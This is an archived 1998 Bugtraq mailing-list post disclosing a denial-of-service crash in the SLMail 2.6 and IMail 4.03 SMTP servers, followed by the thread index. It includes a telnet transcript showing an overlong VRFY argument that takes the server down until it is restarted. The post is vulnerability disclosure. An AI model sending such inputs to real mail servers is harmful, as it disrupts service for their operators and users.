Bugtraq mailing list archives
SLMail 2.6 DoS - Imail also
From: steven () EFNI COM (Jon)
Date: Wed, 11 Mar 1998 21:22:52 -0500
I had wrote earlier:
Hello, I have recently found a quite serious DoS attack for the SLMail 2.6 email daemon (www.seattlelabs.com/slmail). A long string of text after a command makes the program crash. I have only tested this on 2.6, so I'm not sure if other versions are vulnerable. craphole:~$ telnet www.victim.com 25 Trying 555.55.555.55... Connected to www.victim.com. Escape character is '^]'. 220 www.victim.com Smtp Server SLMail v2.6 Ready ESMTP spoken here vrfy dddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddd dddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddd dddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddd dddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddd dddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddd dddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddd dddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddd dddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddd Connection closed by foreign host. craphole:~$ telnet www.victim.com 25 Trying 555.55.555.55... telnet: Unable to connect to remote host: Connection refused craphole:~$ It will stay unresponsive until manually restarted. I haven't mailed Seattle Labs about this, but I'm sure they'll figure it out. Later, Cisc0 @ Undernet steven () efni com
Out of boredom, I tried another smtp daemon for Windows, IMail (I tried 4.03) by IPSwitch (www.ipswitch.com). Which crashed the same way. Pretty strange, I've only tried two windowsNT smtp daemons, and both crashed the same way... Cisc0 @ Undernet steven () efni com
Current thread:
- Vunerable shell scripts, (continued)
- Vunerable shell scripts Michal Zalewski (Mar 14)
- More broadcast fun T. Freak (Mar 14)
- Midnight Commander /tmp race Michal Zalewski (Mar 15)
- Re: Midnight Commander /tmp race Pavel Kankovsky (Mar 17)
- Re: Midnight Commander /tmp race willy () SNOWYOWL CSU AC RU (Mar 17)
- Re: Midnight Commander /tmp race Pavel Kankovsky (Mar 18)
- Solaris printd security vulnerability Aleph One (Mar 11)
- Sun Security Bulletin #00165 Aleph One (Mar 11)
- Fwd: Sun Security Bulletin #00166 Tony Hagale (Mar 11)
- SLMail 2.6 DoS Steven (Mar 11)
- SLMail 2.6 DoS - Imail also Jon (Mar 11)
- Winsock 2.0 DoS John Robinson (Mar 11)
- Re: Winsock 2.0 DoS Henri Karrenbeld (Mar 12)
- more testing of Winsock 2.0 DoS Velocet (Mar 12)
- Re: Winsock 2.0 DoS stevep () ee pdx edu (Mar 12)
- InfoSecurity News jericho () DIMENSIONAL COM (Mar 13)
- Chase Bank joey.wheel (Mar 13)
- Win95 Winsock 2.0 DoS Russ (Mar 13)
- Problems with MDaemon 2.7.1 Development Team (Mar 12)
- FreeBSD Security Advisory: FreeBSD-SA-98:01.land Aleph One (Mar 12)
- FreeBSD Security Advisory: FreeBSD-SA-98:02.mmap Aleph One (Mar 12)